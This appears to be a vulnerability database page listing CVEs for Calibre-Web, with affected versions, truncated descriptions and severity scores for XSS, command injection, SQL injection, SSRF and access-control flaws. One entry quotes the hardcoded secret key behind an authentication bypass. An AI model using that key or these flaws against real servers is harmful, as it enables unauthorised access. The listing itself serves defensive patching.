CVE-2025-65858

all versions

A Stored Cross-Site Scripting (XSS) vulnerability in Calibre-Web v0.6.25 allows attackers to inject malicious JavaScript into the

3.5LOW

CVE-2025-7404

all versions

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Calibre Web, Autocaliw

9.8CRITICAL

CVE-2021-3988

< 0.6.15

A Cross-site Scripting (XSS) vulnerability exists in janeczku/calibre-web, specifically in the file edit_books.js. The vulnerabi

6.1MEDIUM

CVE-2021-3987

< 0.6.15

An improper access control vulnerability exists in janeczku/calibre-web. The affected version allows users without public shelf pe

4.3MEDIUM

CVE-2021-3986

< 0.6.15

A vulnerability in janeczku/calibre-web allows unauthorized users to view the names of private shelves belonging to other users. T

4.3MEDIUM

CVE-2024-39123

>= 0.6.0 and <= 0.6.21

In janeczku Calibre-Web 0.6.0 to 0.6.21, the edit_book_comments function is vulnerable to Cross Site Scripting (XSS) due to improp

5.4MEDIUM

CVE-2023-2106

< 0.6.20

Weak Password Requirements in GitHub repository janeczku/calibre-web prior to 0.6.20.

9.8CRITICAL

CVE-2022-2525

< 0.6.20

Improper Restriction of Excessive Authentication Attempts in GitHub repository janeczku/calibre-web prior to 0.6.20.

9.8CRITICAL

CVE-2022-30765

all versions

Calibre-Web before 0.6.18 allows user table SQL Injection.

9.8CRITICAL

CVE-2022-0990

< 0.6.18

Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.18.

9.1CRITICAL

CVE-2022-0939

< 0.6.18

Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.18.

9.9CRITICAL

CVE-2022-0406

< 0.6.16

Improper Authorization in GitHub repository janeczku/calibre-web prior to 0.6.16.

4.3MEDIUM

CVE-2022-0405

< 0.6.16

Improper Access Control in GitHub repository janeczku/calibre-web prior to 0.6.16.

4.3MEDIUM

CVE-2022-0767

< 0.6.17

Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.17.

9.9CRITICAL

CVE-2022-0766

< 0.6.17

Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.17.

9.8CRITICAL

CVE-2022-0339

< 0.6.16

Server-Side Request Forgery (SSRF) in Pypi calibreweb prior to 0.6.16.

9.8CRITICAL

CVE-2022-0273

< 0.6.16

Improper Access Control in Pypi calibreweb prior to 0.6.16.

6.5MEDIUM

CVE-2022-0352

< 0.6.16

Cross-site Scripting (XSS) - Reflected in Pypi calibreweb prior to 0.6.16.

6.1MEDIUM

CVE-2021-4164

< 0.6.15

calibre-web is vulnerable to Cross-Site Request Forgery (CSRF)

8.8HIGH

CVE-2021-4171

< 0.6.15

calibre-web is vulnerable to Business Logic Errors

9.8CRITICAL

CVE-2021-4170

< 0.6.15

calibre-web is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

5.4MEDIUM

CVE-2021-25965

>= 0.6.0 and <= 0.6.13

In Calibre-web, versions 0.6.0 to 0.6.13 are vulnerable to Cross-Site Request Forgery (CSRF). By luring an authenticated user to c

8.8HIGH

CVE-2021-25964

>= 0.6.0 and < 0.6.12

In “Calibre-web” application, v0.6.0 to v0.6.12, are vulnerable to Stored XSS in “Metadata”. An attacker that has access t

5.4MEDIUM

CVE-2020-12627

all versions

Calibre-Web 0.6.6 allows authentication bypass because of the 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT' hardcoded secret key.

9.8CRITICAL